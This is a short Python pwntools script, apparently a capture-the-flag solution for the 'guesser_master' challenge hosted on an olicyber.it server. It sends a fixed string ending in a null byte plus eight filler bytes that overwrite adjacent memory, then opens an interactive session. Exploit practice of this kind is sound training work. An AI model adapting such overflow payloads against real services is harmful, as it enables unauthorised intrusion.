from pwn import *

context.arch = 'amd64'
binary = ELF('./guesser_master')
p = remote('guessermaster.challs.olicyber.it', 35006)

val = b"KRPASEPYBQPHPKEBQMJIQOYMUDDOPSPAKHDGMSHNLWUCKBFBOQJHFITDNWRDSJGDTJLGESVPSSTDUYELQNSXVPDLOWOHHULBGYJKSFDLAWOUYUGRICPGRVTGSIOCGCFMBOAVVDJWCATBUDSFFLNYHHHCSVFYAKNECNAAQKYTMTWIYSPEGEFPNMRGLWFLITRMJSMBFMWRGVCHOSNWYSMMFFTSCBFMWWYHROIYBHTJDXQUQERRYHFEMBXQCFGAEHH\x00"
override = b"AAAAAAAA"
payload = val + override

print(p.recvuntil(b"input: "))
p.sendline(payload)
p.interactive()